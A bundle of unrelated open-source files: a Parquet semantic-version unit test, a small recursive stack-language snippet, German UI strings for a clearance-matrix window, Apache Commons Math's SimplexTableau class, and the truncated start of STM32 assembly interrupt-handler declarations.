"pile_set_name": "Github"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.parquet;
import org.junit.Test;
import java.util.Arrays;
import java.util.List;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertTrue;
public class SemanticVersionTest {
@Test
public void testCompare() {
assertTrue(new SemanticVersion(1, 8, 1).compareTo(new SemanticVersion(1, 8, 1)) == 0);
assertTrue(new SemanticVersion(1, 8, 0).compareTo(new SemanticVersion(1, 8, 1)) < 0);
assertTrue(new SemanticVersion(1, 8, 2).compareTo(new SemanticVersion(1, 8, 1)) > 0);
assertTrue(new SemanticVersion(1, 8, 1).compareTo(new SemanticVersion(1, 8, 1)) == 0);
assertTrue(new SemanticVersion(1, 8, 0).compareTo(new SemanticVersion(1, 8, 1)) < 0);
assertTrue(new SemanticVersion(1, 8, 2).compareTo(new SemanticVersion(1, 8, 1)) > 0);
assertTrue(new SemanticVersion(1, 7, 0).compareTo(new SemanticVersion(1, 8, 0)) < 0);
assertTrue(new SemanticVersion(1, 9, 0).compareTo(new SemanticVersion(1, 8, 0)) > 0);
assertTrue(new SemanticVersion(0, 0, 0).compareTo(new SemanticVersion(1, 0, 0)) < 0);
assertTrue(new SemanticVersion(2, 0, 0).compareTo(new SemanticVersion(1, 0, 0)) > 0);
assertTrue(new SemanticVersion(1, 8, 100).compareTo(new SemanticVersion(1, 9, 0)) < 0);
assertTrue(new SemanticVersion(1, 8, 0).compareTo(new SemanticVersion(1, 8, 0, true)) > 0);
assertTrue(new SemanticVersion(1, 8, 0, true).compareTo(new SemanticVersion(1, 8, 0, true)) == 0);
assertTrue(new SemanticVersion(1, 8, 0, true).compareTo(new SemanticVersion(1, 8, 0)) < 0);
}
@Test
public void testSemverPrereleaseExamples() throws Exception {
List<String> examples = Arrays.asList("1.0.0-alpha", "1.0.0-alpha.1",
"1.0.0-alpha.beta", "1.0.0-beta", "1.0.0-beta.2", "1.0.0-beta.11",
"1.0.0-rc.1", "1.0.0");
for (int i = 0; i < examples.size() - 1; i += 1) {
assertLessThan(examples.get(i), examples.get(i + 1));
assertEqualTo(examples.get(i), examples.get(i));
}
// the last one didn't get reflexively tested
assertEqualTo(examples.get(examples.size() - 1), examples.get(examples.size() - 1));
}
@Test
public void testSemverBuildInfoExamples() throws Exception {
assertEqualTo("1.0.0-alpha+001", "1.0.0-alpha+001");
assertEqualTo("1.0.0-alpha", "1.0.0-alpha+001");
assertEqualTo("1.0.0+20130313144700", "1.0.0+20130313144700");
assertEqualTo("1.0.0", "1.0.0+20130313144700");
assertEqualTo("1.0.0-beta+exp.sha.5114f85", "1.0.0-beta+exp.sha.5114f85");
assertEqualTo("1.0.0-beta", "1.0.0-beta+exp.sha.5114f85");
}
@Test
public void testUnknownComparisons() throws Exception {
// anything with unknown is lower precedence
assertLessThan("1.0.0rc0-alpha+001", "1.0.0-alpha");
}
@Test
public void testDistributionVersions() throws Exception {
assertEqualTo("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.0");
assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.1");
assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.1-SNAPSHOT");
assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.6.0");
assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh6.0.0");
assertLessThan("1.5.0-cdh5.5.0", "1.5.0");
// according to the semver spec, this is true :(
assertLessThan("1.5.0-cdh5.5.0", "1.5.0-cdh5.5.0-SNAPSHOT");
}
@Test
public void testParse() throws Exception {
assertEquals(new SemanticVersion(1, 8, 0), SemanticVersion.parse("1.8.0"));
assertEquals(new SemanticVersion(1, 8, 0, true), SemanticVersion.parse("1.8.0rc3"));
assertEquals(new SemanticVersion(1, 8, 0, "rc3", "SNAPSHOT", null),
SemanticVersion.parse("1.8.0rc3-SNAPSHOT"));
assertEquals(new SemanticVersion(1, 8, 0, null, "SNAPSHOT", null),
SemanticVersion.parse("1.8.0-SNAPSHOT"));
assertEquals(new SemanticVersion(1, 5, 0, null, "cdh5.5.0", null),
SemanticVersion.parse("1.5.0-cdh5.5.0"));
}
private static void assertLessThan(String a, String b) throws SemanticVersion.SemanticVersionParseException {
assertTrue(a + " should be < " + b, SemanticVersion.parse(a).compareTo(SemanticVersion.parse(b)) < 0);
assertTrue(b + " should be > " + a, SemanticVersion.parse(b).compareTo(SemanticVersion.parse(a)) > 0);
}
private static void assertEqualTo(String a, String b) throws SemanticVersion.SemanticVersionParseException {
assertTrue(a + " should equal " + b, SemanticVersion.parse(a).compareTo(SemanticVersion.parse(b)) == 0);
}
}
|
{
"pile_set_name": "Github"
}
|
/F {
{
{0 eq} {pop 1} is?
{0 gt} {dup 1 sub F M sub} is?
} cond
}.
/M {
{
{0 eq} {pop 0} is?
{0 gt} {dup 1 sub M F sub} is?
} cond
}.
|
{
"pile_set_name": "Github"
}
|
# English version of language dependent text of the class WindowClearanceClass
title = Clearance-Matrix
layer = Lage:
layer_tooltip = Lage einstellen, wo die die Werte der Clearance-Matrix geändert werden können
add_class = Klasse hinzufügen
add_class_tooltip = Eine neue Clearance-Klasse Klasse hinzufügen
prune = Trimmen
prune_tooltip = Redundante Klassen löschen
new_name = Bitte geben Sie den Namen der neuen Klasse ein
confirm_remove = Bitte bestätigen Sie das Löschen der Klasse
class = Klasse
the_class = der Klasse
the_classes = den Klassen
and = und
already_assigned = Objekte sind schon zugewiesen zu
change_anyway = !\nClearance-Regel trotzdem ändern?
|
{
"pile_set_name": "Github"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.commons.math4.optim.linear;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.TreeSet;
import org.apache.commons.math4.exception.DimensionMismatchException;
import org.apache.commons.math4.linear.Array2DRowRealMatrix;
import org.apache.commons.math4.linear.MatrixUtils;
import org.apache.commons.math4.linear.RealVector;
import org.apache.commons.math4.optim.PointValuePair;
import org.apache.commons.math4.optim.nonlinear.scalar.GoalType;
import org.apache.commons.numbers.core.Precision;
/**
* A tableau for use in the Simplex method.
*
* <p>
* Example:
* <pre>
* W | Z | x1 | x2 | x- | s1 | s2 | a1 | RHS
* ---------------------------------------------------
* -1 0 0 0 0 0 0 1 0 <= phase 1 objective
* 0 1 -15 -10 0 0 0 0 0 <= phase 2 objective
* 0 0 1 0 0 1 0 0 2 <= constraint 1
* 0 0 0 1 0 0 1 0 3 <= constraint 2
* 0 0 1 1 0 0 0 1 4 <= constraint 3
* </pre>
* W: Phase 1 objective function<br>
* Z: Phase 2 objective function<br>
* x1 & x2: Decision variables<br>
* x-: Extra decision variable to allow for negative values<br>
* s1 & s2: Slack/Surplus variables<br>
* a1: Artificial variable<br>
* RHS: Right hand side<br>
*
* Note on usage and safety:
* The class is package private. It is not meant for public usage.
* The core data structure, the tableau field, is mutated internally and
* even reallocated when necessary.
* Proper usage of this class is demonstrated in SimplexSolver,
* where the class is only ever constructed in a method (never a field
* of an object), and its lifetime, is therefore bound to a single thread (the
* thread that's invoking the method).
*
* @since 2.0
*/
class SimplexTableau implements Serializable {
/** Column label for negative vars. */
private static final String NEGATIVE_VAR_COLUMN_LABEL = "x-";
/** Serializable version identifier. */
private static final long serialVersionUID = -1369660067587938365L;
/** bit mask for IEEE double exponent **/
private static final long EXPN = 0x7ff0000000000000L;
/** bit mask for IEEE double mantissa and sign **/
private static final long FRAC = 0x800fffffffffffffL;
/** max IEEE exponent is 2047 **/
private static final int MAX_IEEE_EXP = 2047;
/** min IEEE exponent is 0 **/
private static final int MIN_IEEE_EXP = 0;
/** IEEE exponent is kept in an offset form, 1023 is zero **/
private static final int OFFSET_IEEE_EXP = 1023;
/** double exponent shift per IEEE standard **/
private static final int IEEE_EXPONENT_SHIFT = 52;
/** Linear objective function. */
private final LinearObjectiveFunction f;
/** Linear constraints. */
private final List<LinearConstraint> constraints;
/** Whether to restrict the variables to non-negative values. */
private final boolean restrictToNonNegative;
/** The variables each column represents */
private final List<String> columnLabels = new ArrayList<>();
/** Simple tableau. */
private transient Array2DRowRealMatrix tableau;
/** Number of decision variables. */
private final int numDecisionVariables;
/** Number of slack variables. */
private final int numSlackVariables;
/** Number of artificial variables. */
private int numArtificialVariables;
/** Amount of error to accept when checking for optimality. */
private final double epsilon;
/** Amount of error to accept in floating point comparisons. */
private final int maxUlps;
/** Maps basic variables to row they are basic in. */
private int[] basicVariables;
/** Maps rows to their corresponding basic variables. */
private int[] basicRows;
/** changes in floating point exponent to scale the input */
private int[] variableExpChange;
/**
* Builds a tableau for a linear problem.
*
* @param f Linear objective function.
* @param constraints Linear constraints.
* @param goalType Optimization goal: either {@link GoalType#MAXIMIZE}
* or {@link GoalType#MINIMIZE}.
* @param restrictToNonNegative Whether to restrict the variables to non-negative values.
* @param epsilon Amount of error to accept when checking for optimality.
* @throws DimensionMismatchException if the dimension of the constraints does not match the
* dimension of the objective function
*/
SimplexTableau(final LinearObjectiveFunction f,
final Collection<LinearConstraint> constraints,
final GoalType goalType,
final boolean restrictToNonNegative,
final double epsilon) {
this(f, constraints, goalType, restrictToNonNegative, epsilon, SimplexSolver.DEFAULT_ULPS);
}
/**
* Build a tableau for a linear problem.
* @param f linear objective function
* @param constraints linear constraints
* @param goalType type of optimization goal: either {@link GoalType#MAXIMIZE} or {@link GoalType#MINIMIZE}
* @param restrictToNonNegative whether to restrict the variables to non-negative values
* @param epsilon amount of error to accept when checking for optimality
* @param maxUlps amount of error to accept in floating point comparisons
* @throws DimensionMismatchException if the dimension of the constraints does not match the
* dimension of the objective function
*/
SimplexTableau(final LinearObjectiveFunction f,
final Collection<LinearConstraint> constraints,
final GoalType goalType,
final boolean restrictToNonNegative,
final double epsilon,
final int maxUlps) throws DimensionMismatchException {
checkDimensions(f, constraints);
this.f = f;
this.constraints = normalizeConstraints(constraints);
this.restrictToNonNegative = restrictToNonNegative;
this.epsilon = epsilon;
this.maxUlps = maxUlps;
this.numDecisionVariables = f.getCoefficients().getDimension() + (restrictToNonNegative ? 0 : 1);
this.numSlackVariables = getConstraintTypeCounts(Relationship.LEQ) +
getConstraintTypeCounts(Relationship.GEQ);
this.numArtificialVariables = getConstraintTypeCounts(Relationship.EQ) +
getConstraintTypeCounts(Relationship.GEQ);
this.tableau = createTableau(goalType == GoalType.MAXIMIZE);
// initialize the basic variables for phase 1:
// we know that only slack or artificial variables can be basic
initializeBasicVariables(getSlackVariableOffset());
initializeColumnLabels();
}
/**
* Checks that the dimensions of the objective function and the constraints match.
* @param objectiveFunction the objective function
* @param c the set of constraints
* @throws DimensionMismatchException if the constraint dimensions do not match with the
* dimension of the objective function
*/
private void checkDimensions(final LinearObjectiveFunction objectiveFunction,
final Collection<LinearConstraint> c) {
final int dimension = objectiveFunction.getCoefficients().getDimension();
for (final LinearConstraint constraint : c) {
final int constraintDimension = constraint.getCoefficients().getDimension();
if (constraintDimension != dimension) {
throw new DimensionMismatchException(constraintDimension, dimension);
}
}
}
/**
* Initialize the labels for the columns.
*/
protected void initializeColumnLabels() {
if (getNumObjectiveFunctions() == 2) {
columnLabels.add("W");
}
columnLabels.add("Z");
for (int i = 0; i < getOriginalNumDecisionVariables(); i++) {
columnLabels.add("x" + i);
}
if (!restrictToNonNegative) {
columnLabels.add(NEGATIVE_VAR_COLUMN_LABEL);
}
for (int i = 0; i < getNumSlackVariables(); i++) {
columnLabels.add("s" + i);
}
for (int i = 0; i < getNumArtificialVariables(); i++) {
columnLabels.add("a" + i);
}
columnLabels.add("RHS");
}
/**
* Create the tableau by itself.
* @param maximize if true, goal is to maximize the objective function
* @return created tableau
*/
protected Array2DRowRealMatrix createTableau(final boolean maximize) {
// create a matrix of the correct size
int width = numDecisionVariables + numSlackVariables +
numArtificialVariables + getNumObjectiveFunctions() + 1; // + 1 is for RHS
int height = constraints.size() + getNumObjectiveFunctions();
Array2DRowRealMatrix matrix = new Array2DRowRealMatrix(height, width);
// initialize the objective function rows
if (getNumObjectiveFunctions() == 2) {
matrix.setEntry(0, 0, -1);
}
int zIndex = (getNumObjectiveFunctions() == 1) ? 0 : 1;
matrix.setEntry(zIndex, zIndex, maximize ? 1 : -1);
double[][] scaled = new double[constraints.size() + 1][];
RealVector objectiveCoefficients = maximize ? f.getCoefficients().mapMultiply(-1) : f.getCoefficients();
scaled[0] = objectiveCoefficients.toArray();
double[] scaledRhs = new double[constraints.size() + 1];
double value = maximize ? f.getConstantTerm() : -1 * f.getConstantTerm();
scaledRhs[0] = value;
for (int i = 0; i < constraints.size(); i++) {
LinearConstraint constraint = constraints.get(i);
scaled[i + 1] = constraint.getCoefficients().toArray();
scaledRhs[i + 1] = constraint.getValue();
}
variableExpChange = new int[scaled[0].length];
scale(scaled, scaledRhs);
copyArray(scaled[0], matrix.getDataRef()[zIndex]);
matrix.setEntry(zIndex, width - 1, scaledRhs[0]);
if (!restrictToNonNegative) {
matrix.setEntry(zIndex, getSlackVariableOffset() - 1,
getInvertedCoefficientSum(scaled[0]));
}
// initialize the constraint rows
int slackVar = 0;
int artificialVar = 0;
for (int i = 0; i < constraints.size(); i++) {
final LinearConstraint constraint = constraints.get(i);
final int row = getNumObjectiveFunctions() + i;
// decision variable coefficients
copyArray(scaled[i + 1], matrix.getDataRef()[row]);
// x-
if (!restrictToNonNegative) {
matrix.setEntry(row, getSlackVariableOffset() - 1,
getInvertedCoefficientSum(scaled[i + 1]));
}
// RHS
matrix.setEntry(row, width - 1, scaledRhs[i + 1]);
// slack variables
if (constraint.getRelationship() == Relationship.LEQ) {
matrix.setEntry(row, getSlackVariableOffset() + slackVar++, 1); // slack
} else if (constraint.getRelationship() == Relationship.GEQ) {
matrix.setEntry(row, getSlackVariableOffset() + slackVar++, -1); // excess
}
// artificial variables
if ((constraint.getRelationship() == Relationship.EQ) ||
(constraint.getRelationship() == Relationship.GEQ)) {
matrix.setEntry(0, getArtificialVariableOffset() + artificialVar, 1);
matrix.setEntry(row, getArtificialVariableOffset() + artificialVar++, 1);
matrix.setRowVector(0, matrix.getRowVector(0).subtract(matrix.getRowVector(row)));
}
}
return matrix;
}
/** We scale the constants in the equations and objective, which means we try
* to get the IEEE double exponent as close to zero (1023) as possible, which makes the
* constants closer to 1.
* We use exponent shifts instead of division because that introduces no bit errors.
*
* @param scaled coefficients before scaling
* @param scaledRhs right hand side before scaling
*/
private void scale(double[][] scaled, double[] scaledRhs) {
/*
first transform across:
c0 x0 + c1 x1 + ... + cn xn = vn ==> (2^expChange) * (c0 x0 + c1 x1 + ... + cn xn = vn)
expChange will be negative if the constants are larger than 1,
it'll be positive if the constants are less than 1.
*/
for (int i = 0; i < scaled.length; i++) {
int minExp = MAX_IEEE_EXP + 1;
int maxExp = MIN_IEEE_EXP - 1;
for (double d: scaled[i]) {
if (d != 0) {
int e = exponent(d);
if (e < minExp) {
minExp = e;
}
if (e > maxExp) {
maxExp = e;
}
}
}
if (scaledRhs[i] != 0) {
final int e = exponent(scaledRhs[i]);
if (e < minExp) {
minExp = e;
}
if (e > maxExp) {
maxExp = e;
}
}
final int expChange = computeExpChange(minExp, maxExp);
if (expChange != 0) {
scaledRhs[i] = updateExponent(scaledRhs[i], expChange);
updateExponent(scaled[i], expChange);
}
}
/*
second, transform down the columns. this is like defining a new variable for that column
that is yi = xi * (2^expChange)
After solving for yi, we compute xi by shifting again. See getSolution()
*/
for (int i = 0; i < variableExpChange.length; i++) {
int minExp = MAX_IEEE_EXP + 1;
int maxExp = MIN_IEEE_EXP - 1;
for (double[] coefficients : scaled) {
final double d = coefficients[i];
if (d != 0) {
int e = exponent(d);
if (e < minExp) {
minExp = e;
}
if (e > maxExp) {
maxExp = e;
}
}
}
final int expChange = computeExpChange(minExp, maxExp);
variableExpChange[i] = expChange;
if (expChange != 0) {
for (double[] coefficients : scaled) {
coefficients[i] = updateExponent(coefficients[i], expChange);
}
}
}
}
/**
* Given the minimum and maximum value of the exponent of two {@code double}
* values, pick a change in exponent to bring those values closer to 1.
*
* @param minExp Smallest exponent.
* @param maxExp Largest exponent.
* @return the new exponent.
*/
private int computeExpChange(int minExp, int maxExp) {
int expChange = 0;
if (minExp <= MAX_IEEE_EXP &&
minExp > OFFSET_IEEE_EXP) {
expChange = OFFSET_IEEE_EXP - minExp;
} else if (maxExp >= MIN_IEEE_EXP &&
maxExp < OFFSET_IEEE_EXP) {
expChange = OFFSET_IEEE_EXP - maxExp;
}
return expChange;
}
/**
* Changes the exponent of every member of the array by the given amount.
*
* @param dar array of doubles to change
* @param exp exponent value to change
*/
private static void updateExponent(double[] dar, int exp) {
for (int i = 0; i < dar.length; i++) {
dar[i] = updateExponent(dar[i], exp);
}
}
/**
* Extract the exponent of a {@code double}.
*
* @param d value to extract the exponent from
* @return the IEEE exponent in the EXPN bits, as an integer
*/
private static int exponent(double d) {
final long bits = Double.doubleToLongBits(d);
return (int) ((bits & EXPN) >>> IEEE_EXPONENT_SHIFT);
}
/**
* Changes the exponent of a number by the given amount.
*
* @param d value to change
* @param exp exponent to add to the existing exponent (may be negative)
* @return a double with the same sign/mantissa bits as d, but exponent changed by exp
*/
private static double updateExponent(double d, int exp) {
if (d == 0 ||
exp == 0) {
return d;
}
final long bits = Double.doubleToLongBits(d);
return Double.longBitsToDouble((bits & FRAC) | ((((bits & EXPN) >>> IEEE_EXPONENT_SHIFT) + exp) << IEEE_EXPONENT_SHIFT));
}
/**
* Get new versions of the constraints which have positive right hand sides.
* @param originalConstraints original (not normalized) constraints
* @return new versions of the constraints
*/
public List<LinearConstraint> normalizeConstraints(Collection<LinearConstraint> originalConstraints) {
final List<LinearConstraint> normalized = new ArrayList<>(originalConstraints.size());
for (LinearConstraint constraint : originalConstraints) {
normalized.add(normalize(constraint));
}
return normalized;
}
/**
* Get a new equation equivalent to this one with a positive right hand side.
* @param constraint reference constraint
* @return new equation
*/
private LinearConstraint normalize(final LinearConstraint constraint) {
if (constraint.getValue() < 0) {
return new LinearConstraint(constraint.getCoefficients().mapMultiply(-1),
constraint.getRelationship().oppositeRelationship(),
-1 * constraint.getValue());
}
return new LinearConstraint(constraint.getCoefficients(),
constraint.getRelationship(), constraint.getValue());
}
/**
* Get the number of objective functions in this tableau.
* @return 2 for Phase 1. 1 for Phase 2.
*/
protected final int getNumObjectiveFunctions() {
return this.numArtificialVariables > 0 ? 2 : 1;
}
/**
* Get a count of constraints corresponding to a specified relationship.
* @param relationship relationship to count
* @return number of constraint with the specified relationship
*/
private int getConstraintTypeCounts(final Relationship relationship) {
int count = 0;
for (final LinearConstraint constraint : constraints) {
if (constraint.getRelationship() == relationship) {
++count;
}
}
return count;
}
/**
* Get the -1 times the sum of all coefficients in the given array.
* @param coefficients coefficients to sum
* @return the -1 times the sum of all coefficients in the given array.
*/
private static double getInvertedCoefficientSum(final double[] coefficients) {
double sum = 0;
for (double coefficient : coefficients) {
sum -= coefficient;
}
return sum;
}
/**
* Checks whether the given column is basic.
* @param col index of the column to check
* @return the row that the variable is basic in. null if the column is not basic
*/
protected Integer getBasicRow(final int col) {
final int row = basicVariables[col];
return row == -1 ? null : row;
}
/**
* Returns the variable that is basic in this row.
* @param row the index of the row to check
* @return the variable that is basic for this row.
*/
protected int getBasicVariable(final int row) {
return basicRows[row];
}
/**
* Initializes the basic variable / row mapping.
* @param startColumn the column to start
*/
private void initializeBasicVariables(final int startColumn) {
basicVariables = new int[getWidth() - 1];
basicRows = new int[getHeight()];
Arrays.fill(basicVariables, -1);
for (int i = startColumn; i < getWidth() - 1; i++) {
Integer row = findBasicRow(i);
if (row != null) {
basicVariables[i] = row;
basicRows[row] = i;
}
}
}
/**
* Returns the row in which the given column is basic.
* @param col index of the column
* @return the row that the variable is basic in, or {@code null} if the variable is not basic.
*/
private Integer findBasicRow(final int col) {
Integer row = null;
for (int i = 0; i < getHeight(); i++) {
final double entry = getEntry(i, col);
if (Precision.equals(entry, 1d, maxUlps) && (row == null)) {
row = i;
} else if (!Precision.equals(entry, 0d, maxUlps)) {
return null;
}
}
return row;
}
/**
* Removes the phase 1 objective function, positive cost non-artificial variables,
* and the non-basic artificial variables from this tableau.
*/
protected void dropPhase1Objective() {
if (getNumObjectiveFunctions() == 1) {
return;
}
final Set<Integer> columnsToDrop = new TreeSet<>();
columnsToDrop.add(0);
// positive cost non-artificial variables
for (int i = getNumObjectiveFunctions(); i < getArtificialVariableOffset(); i++) {
final double entry = getEntry(0, i);
if (Precision.compareTo(entry, 0d, epsilon) > 0) {
columnsToDrop.add(i);
}
}
// non-basic artificial variables
for (int i = 0; i < getNumArtificialVariables(); i++) {
int col = i + getArtificialVariableOffset();
if (getBasicRow(col) == null) {
columnsToDrop.add(col);
}
}
final double[][] matrix = new double[getHeight() - 1][getWidth() - columnsToDrop.size()];
for (int i = 1; i < getHeight(); i++) {
int col = 0;
for (int j = 0; j < getWidth(); j++) {
if (!columnsToDrop.contains(j)) {
matrix[i - 1][col++] = getEntry(i, j);
}
}
}
// remove the columns in reverse order so the indices are correct
Integer[] drop = columnsToDrop.toArray(new Integer[columnsToDrop.size()]);
for (int i = drop.length - 1; i >= 0; i--) {
columnLabels.remove((int) drop[i]);
}
this.tableau = new Array2DRowRealMatrix(matrix);
this.numArtificialVariables = 0;
// need to update the basic variable mappings as row/columns have been dropped
initializeBasicVariables(getNumObjectiveFunctions());
}
/**
* @param src the source array
* @param dest the destination array
*/
private void copyArray(final double[] src, final double[] dest) {
System.arraycopy(src, 0, dest, getNumObjectiveFunctions(), src.length);
}
/**
* Returns whether the problem is at an optimal state.
* @return whether the model has been solved
*/
boolean isOptimal() {
final double[] objectiveFunctionRow = getRow(0);
final int end = getRhsOffset();
for (int i = getNumObjectiveFunctions(); i < end; i++) {
final double entry = objectiveFunctionRow[i];
if (Precision.compareTo(entry, 0d, epsilon) < 0) {
return false;
}
}
return true;
}
/**
* Get the current solution.
* @return current solution
*/
protected PointValuePair getSolution() {
int negativeVarColumn = columnLabels.indexOf(NEGATIVE_VAR_COLUMN_LABEL);
Integer negativeVarBasicRow = negativeVarColumn > 0 ? getBasicRow(negativeVarColumn) : null;
double mostNegative = negativeVarBasicRow == null ? 0 : getEntry(negativeVarBasicRow, getRhsOffset());
final Set<Integer> usedBasicRows = new HashSet<>();
final double[] coefficients = new double[getOriginalNumDecisionVariables()];
for (int i = 0; i < coefficients.length; i++) {
int colIndex = columnLabels.indexOf("x" + i);
if (colIndex < 0) {
coefficients[i] = 0;
continue;
}
Integer basicRow = getBasicRow(colIndex);
if (basicRow != null && basicRow == 0) {
// if the basic row is found to be the objective function row
// set the coefficient to 0 -> this case handles unconstrained
// variables that are still part of the objective function
coefficients[i] = 0;
} else if (usedBasicRows.contains(basicRow)) {
// if multiple variables can take a given value
// then we choose the first and set the rest equal to 0
coefficients[i] = 0 - (restrictToNonNegative ? 0 : mostNegative);
} else {
usedBasicRows.add(basicRow);
coefficients[i] =
(basicRow == null ? 0 : getEntry(basicRow, getRhsOffset())) -
(restrictToNonNegative ? 0 : mostNegative);
}
coefficients[i] = updateExponent(coefficients[i], variableExpChange[i]);
}
return new PointValuePair(coefficients, f.value(coefficients));
}
/**
* Perform the row operations of the simplex algorithm with the selected
* pivot column and row.
* @param pivotCol the pivot column
* @param pivotRow the pivot row
*/
protected void performRowOperations(int pivotCol, int pivotRow) {
// set the pivot element to 1
final double pivotVal = getEntry(pivotRow, pivotCol);
divideRow(pivotRow, pivotVal);
// set the rest of the pivot column to 0
for (int i = 0; i < getHeight(); i++) {
if (i != pivotRow) {
final double multiplier = getEntry(i, pivotCol);
if (multiplier != 0.0) {
subtractRow(i, pivotRow, multiplier);
}
}
}
// update the basic variable mappings
final int previousBasicVariable = getBasicVariable(pivotRow);
basicVariables[previousBasicVariable] = -1;
basicVariables[pivotCol] = pivotRow;
basicRows[pivotRow] = pivotCol;
}
/**
* Divides one row by a given divisor.
* <p>
* After application of this operation, the following will hold:
* <pre>dividendRow = dividendRow / divisor</pre>
*
* @param dividendRowIndex index of the row
* @param divisor value of the divisor
*/
protected void divideRow(final int dividendRowIndex, final double divisor) {
final double[] dividendRow = getRow(dividendRowIndex);
for (int j = 0; j < getWidth(); j++) {
dividendRow[j] /= divisor;
}
}
/**
* Subtracts a multiple of one row from another.
* <p>
* After application of this operation, the following will hold:
* <pre>minuendRow = minuendRow - multiple * subtrahendRow</pre>
*
* @param minuendRowIndex row index
* @param subtrahendRowIndex row index
* @param multiplier multiplication factor
*/
protected void subtractRow(final int minuendRowIndex, final int subtrahendRowIndex, final double multiplier) {
final double[] minuendRow = getRow(minuendRowIndex);
final double[] subtrahendRow = getRow(subtrahendRowIndex);
for (int i = 0; i < getWidth(); i++) {
minuendRow[i] -= subtrahendRow[i] * multiplier;
}
}
/**
* Get the width of the tableau.
* @return width of the tableau
*/
protected final int getWidth() {
return tableau.getColumnDimension();
}
/**
* Get the height of the tableau.
* @return height of the tableau
*/
protected final int getHeight() {
return tableau.getRowDimension();
}
/**
* Get an entry of the tableau.
* @param row row index
* @param column column index
* @return entry at (row, column)
*/
protected final double getEntry(final int row, final int column) {
return tableau.getEntry(row, column);
}
/**
* Set an entry of the tableau.
* @param row row index
* @param column column index
* @param value for the entry
*/
protected final void setEntry(final int row, final int column, final double value) {
tableau.setEntry(row, column, value);
}
/**
* Get the offset of the first slack variable.
* @return offset of the first slack variable
*/
protected final int getSlackVariableOffset() {
return getNumObjectiveFunctions() + numDecisionVariables;
}
/**
* Get the offset of the first artificial variable.
* @return offset of the first artificial variable
*/
protected final int getArtificialVariableOffset() {
return getNumObjectiveFunctions() + numDecisionVariables + numSlackVariables;
}
/**
* Get the offset of the right hand side.
* @return offset of the right hand side
*/
protected final int getRhsOffset() {
return getWidth() - 1;
}
/**
* Get the number of decision variables.
* <p>
* If variables are not restricted to positive values, this will include 1 extra decision variable to represent
* the absolute value of the most negative variable.
*
* @return number of decision variables
* @see #getOriginalNumDecisionVariables()
*/
protected final int getNumDecisionVariables() {
return numDecisionVariables;
}
/**
* Get the original number of decision variables.
* @return original number of decision variables
* @see #getNumDecisionVariables()
*/
protected final int getOriginalNumDecisionVariables() {
return f.getCoefficients().getDimension();
}
/**
* Get the number of slack variables.
* @return number of slack variables
*/
protected final int getNumSlackVariables() {
return numSlackVariables;
}
/**
* Get the number of artificial variables.
* @return number of artificial variables
*/
protected final int getNumArtificialVariables() {
return numArtificialVariables;
}
/**
* Get the row from the tableau.
* @param row the row index
* @return the reference to the underlying row data
*/
protected final double[] getRow(int row) {
return tableau.getDataRef()[row];
}
/**
* Get the tableau data.
* @return tableau data
*/
protected final double[][] getData() {
return tableau.getData();
}
/** {@inheritDoc} */
@Override
public boolean equals(Object other) {
if (this == other) {
return true;
}
if (other instanceof SimplexTableau) {
SimplexTableau rhs = (SimplexTableau) other;
return (restrictToNonNegative == rhs.restrictToNonNegative) &&
(numDecisionVariables == rhs.numDecisionVariables) &&
(numSlackVariables == rhs.numSlackVariables) &&
(numArtificialVariables == rhs.numArtificialVariables) &&
(epsilon == rhs.epsilon) &&
(maxUlps == rhs.maxUlps) &&
f.equals(rhs.f) &&
constraints.equals(rhs.constraints) &&
tableau.equals(rhs.tableau);
}
return false;
}
/** {@inheritDoc} */
@Override
public int hashCode() {
return Boolean.valueOf(restrictToNonNegative).hashCode() ^
numDecisionVariables ^
numSlackVariables ^
numArtificialVariables ^
Double.valueOf(epsilon).hashCode() ^
maxUlps ^
f.hashCode() ^
constraints.hashCode() ^
tableau.hashCode();
}
/**
* Serialize the instance.
* @param oos stream where object should be written
* @throws IOException if object cannot be written to stream
*/
private void writeObject(ObjectOutputStream oos)
throws IOException {
oos.defaultWriteObject();
MatrixUtils.serializeRealMatrix(tableau, oos);
}
/**
* Deserialize the instance.
* @param ois stream from which the object should be read
* @throws ClassNotFoundException if a class in the stream cannot be found
* @throws IOException if object cannot be read from the stream
*/
private void readObject(ObjectInputStream ois)
throws ClassNotFoundException, IOException {
ois.defaultReadObject();
MatrixUtils.deserializeRealMatrix(this, "tableau", ois);
}
}
|
{
"pile_set_name": "Github"
}
|
/* STM32 ISR weak declarations */
.thumb
/* Default handler for all non-overridden interrupts and exceptions */
.globl __default_handler
.type __default_handler, %function
__default_handler:
b .
.weak __exc_nmi
.globl __exc_nmi
.set __exc_nmi, __default_handler
.weak __exc_hardfault
.globl __exc_hardfault
.set __exc_hardfault, __default_handler
.weak __exc_memmanage
.globl __exc_memmanage
.set __exc_memmanage, __default_handler
.weak __exc_busfault
.globl __exc_busfault
.set __exc_busfault, __default_handler
.weak __exc_usagefault
.globl __exc_usagefault
.set __exc_usagefault, __default_handler
.weak __stm32reservedexception7
